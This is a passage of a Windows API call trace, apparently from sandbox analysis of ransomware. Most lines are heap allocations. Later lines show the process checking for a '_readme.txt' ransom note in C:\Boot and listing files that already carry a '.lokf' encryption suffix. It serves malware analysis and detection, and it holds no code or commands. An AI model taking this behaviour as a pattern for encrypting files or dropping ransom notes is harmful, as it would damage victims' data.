1 [0146.432] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.432] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.432] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.432] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.432] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.432] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.432] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.432] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.432] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.432] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.432] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.432] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.433] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.433] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.433] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.433] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.433] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.433] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.433] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.433] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.433] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e6d0 | out: hHeap=0x6e0000) returned 1 [0146.433] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32407f8 [0146.433] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.433] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.433] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.433] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.433] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.433] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.433] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.433] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.433] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.433] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.433] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.433] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.433] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.433] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.433] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.433] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.433] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.433] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.433] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.433] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.433] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.433] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.433] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.433] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.433] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.433] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.433] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.433] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x3a65050 [0146.434] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.434] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.434] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.434] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.434] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.434] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.434] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.434] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.434] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.434] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.434] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.434] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.434] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x3a65050 [0146.434] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.434] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.434] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.434] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x3a65050 [0146.434] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.434] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.434] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.434] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.434] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.434] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.434] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.434] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.434] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.434] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.434] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.434] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.434] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.434] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.434] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.434] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.434] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.434] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.434] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.434] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.434] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.434] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.435] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.435] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.435] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.435] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.435] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.435] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.435] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.435] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.435] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.435] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.435] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.435] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.435] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.435] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.435] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.435] PathFindFileNameW (pszPath="") returned="" [0146.435] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.435] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.436] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a65050 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.436] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.436] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408e8 | out: hHeap=0x6e0000) returned 1 [0146.436] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.436] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0146.436] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.436] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408e8 | out: hHeap=0x6e0000) returned 1 [0146.436] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 1 [0146.436] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.436] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.436] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1fd20050, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1fd20050, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.436] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408e8 | out: hHeap=0x6e0000) returned 1 [0146.436] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1fd20050, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1fd20050, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.436] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0146.436] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x469b3b00, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0146.436] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1.lokf", cAlternateFileName="BCDLOG~1.LOK")) returned 1 [0146.437] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2.lokf", cAlternateFileName="BCDLOG~2.LOK")) returned 1 [0146.437] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x1fcf9ef0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1014e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT.lokf", cAlternateFileName="BOOTST~1.LOK")) returned 1 [0146.437] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea61310, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea61310, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0146.437] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.437] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.437] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1c) returned 0x3240898 [0146.437] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240988 [0146.437] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.437] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408e8 | out: hHeap=0x6e0000) returned 1 [0146.437] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0146.437] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.437] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.437] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x38) returned 0x3220d98 [0146.437] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240960 [0146.437] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240988 | out: hHeap=0x6e0000) returned 1 [0146.437] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240898 | out: hHeap=0x6e0000) returned 1 [0146.437] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240898 [0146.437] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.437] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408e8 | out: hHeap=0x6e0000) returned 1 [0146.437] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0146.437] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.437] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.437] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x54) returned 0x3216cb0 [0146.437] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240988 [0146.437] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240938 [0146.437] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240960 | out: hHeap=0x6e0000) returned 1 [0146.437] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240898 | out: hHeap=0x6e0000) returned 1 [0146.437] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3220d98 | out: hHeap=0x6e0000) returned 1 [0146.437] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240898 [0146.437] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.437] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408e8 | out: hHeap=0x6e0000) returned 1 [0146.437] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaad5d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaad5d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0146.437] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.437] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.437] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x70) returned 0x31f3c20 [0146.437] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240960 [0146.437] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240910 [0146.437] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240870 [0146.438] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ead3730, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ead3730, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xa8) returned 0x31e15a8 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240938 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240988 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240aa0 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ac8 [0146.438] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240870 [0146.438] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xfc) returned 0x3201db8 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240910 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240960 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b18 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b40 [0146.438] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.438] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb1f9f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb1f9f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0146.438] RtlAllocateHeap 